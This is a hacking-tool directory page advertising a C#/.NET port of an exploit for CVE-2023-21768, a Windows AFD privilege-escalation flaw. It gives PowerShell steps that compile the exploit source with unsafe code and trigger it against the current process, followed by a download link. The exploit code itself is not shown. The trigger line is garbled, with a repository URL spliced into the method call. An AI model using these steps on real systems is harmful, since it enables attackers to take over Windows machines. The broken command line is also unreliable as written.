Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-21768-dotnet — C# / .NET version of CVE-2023-21768 | Kitploit
Tools/GitHubGitHub/xboxoneresearch/cve-2023-21768-dotnet
Privilege EscalationVulnerability AnalysisExploitationPayload Development
GitHubxboxoneresearch/cve-2023-21768-dotnet

CVE-2023-21768-dotnet

C# / .NET version of CVE-2023-21768

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
151 year agoNot yet reviewed

CVE-2023-21768 - Dotnet

Dotnet / c# port of AFD-for-WinSock-EoP exploit

References:

  • https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit
  • https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768

Why?

Sometimes you can't use compiled binaries.

How to?

Run the following in powershell.

root@kitploit:~
$PWSH_PID = ([System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -ExpandProperty ID)
echo "[*] Current powershell PID: $PWSH_PID"
echo "[+] Compiling EoP exploit"
Add-Type -Path eop.cs -CompilerOptions "-unsafe"
echo "[+] Triggering exploit"
[XOR.EoP]:https://raw.githubusercontent.com/xboxoneresearch/cve-2023-21768-dotnet/HEAD/:Run($PWSH_PID)
echo "[+] Exploit finished"
Download Tool